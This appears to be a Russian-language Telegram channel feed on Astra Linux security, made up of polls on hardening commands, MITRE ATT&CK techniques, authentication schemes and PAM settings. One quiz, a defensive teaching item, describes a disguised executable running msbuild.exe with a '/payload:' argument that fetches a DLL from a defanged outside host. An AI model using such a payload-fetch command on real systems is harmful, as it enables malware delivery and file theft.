Linux Security
589 subscribers
13 photos
2 videos
17 files
188 links
Неофициальный канал про ОС Astra Linux. Для специалистов по ИБ, пользователей и администраторов.
Download Telegram
Какие команды нужны для ЗИС.21. Исключение доступа пользователя к инф., возникшей в результате действий предыдущего пользователя через реестры,оперативную пам., внешние запоминающие устройства и иные общие для пользователей ресурсы информационной системы
Anonymous Quiz
14%
1.astra-swapwiper-control enable
15%
2.astra-secdel-control enable
1%
3.astra-nobootmenu-control enable
38%
1 и 2 вариант
4%
2 и 3 вариант
3%
1 и 3 вариант
4%
4 и 7 вариант
20%
Ты обалдел так много вариантов?
1. Cотрудник получил письмо.
2. Открыл файл list.exe, маскирующийся под PDF.
3. На ПК запустился процесс msbuild.exe с аргументами: /tmp:7a1 /payload:https://me[.]xyz/get.dll 4. Процесс подключился к IP и начал копировать файлы. Какая это тактика?
Anonymous Quiz
7%
T1204.001 - Вредоносная ссылка
40%
T1204.002 - Вредоносный файл
19%
T1195.002 - Цепочка поставок компрометирующего программного обеспечения
7%
T1195.001 - Компрометация зависимого программного обеспечения и средств разработки
27%
Нехрен было ставить Винду
Матрица MITRE ATT&CK описывает тактики и техники, которыми злоумышленники пользуются в своих атаках на корпоративную инфраструктуру.

https://mitre.ptsecurity.com/ru-RU

Сервис моделирования от Кода безопасности

https://mitre.securitycode.ru/
Проверка на уязвимости средствами Astra Linux

https://wiki.astralinux.ru/pages/viewpage.action?pageId=331355418
ИАФ. Для этой схемы аутентификации требуется только имя пользователя и пароль. Клиент берет эти два удостоверения, склеивает их вместе, чтобы сформировать одно значение, и передает его в запросе (Например, в заголовке HTTP, называемом Authorization).
Anonymous Quiz
18%
Аутентификация по ключу API
64%
Базовая аутентификация (Basic)
11%
Открытая авторизация (Oauth)
7%
Digest схема
isp_37_2025_2_61.pdf
587.9 KB
Научная работа. Проектирование и развитие
механизма мандатного контроля целостности
в операционной системе Astra Linux
3
В 2024 году специалисты аналитического центра США из Совета по международным отношениям (Council on Foreign Relations, CFR) призвали задействовать спецслужбы для понимания уровня защищённости ОС Astra Linux. На что они хотели обратить внимание?
Anonymous Quiz
65%
Потенциальные уязвимости открытого программного обеспечения, которые по их мнению используются в ОС
6%
На то что некоторые пользователи не включают ЗПС
0%
На то что пользователи не всегда читают инструкции
29%
На то что РусБИТех не публикует свой исходный код
🤯1
ОДТ. В 2020 году вредоносный шифровальщик Trickbot продемонстрировал, что нужно уделять особое внимание архитектуре резервного копирования данных. Какая техника не была учтена при моделировании угроз атакованной компании?
Anonymous Quiz
25%
T1490 - Запрет восстановления системы
19%
T1498 - Сетевой отказ в обслуживании
40%
T1486 - Шифрование данных
9%
T1485 - Уничтожение данных
7%
T1561 - Очистка диска
1
ИАФ. В настройках PAM встретились такие параметры: minlen=10 lcredit=-2 ucredit=0 dcredit=-3 ocredit=0. Что они означают?
Anonymous Quiz
3%
Какие то кредиты?!
6%
Обозначение срока действия пароля
18%
Указывает количество попыток неправильного ввода
73%
Параметры определяют сложность пароля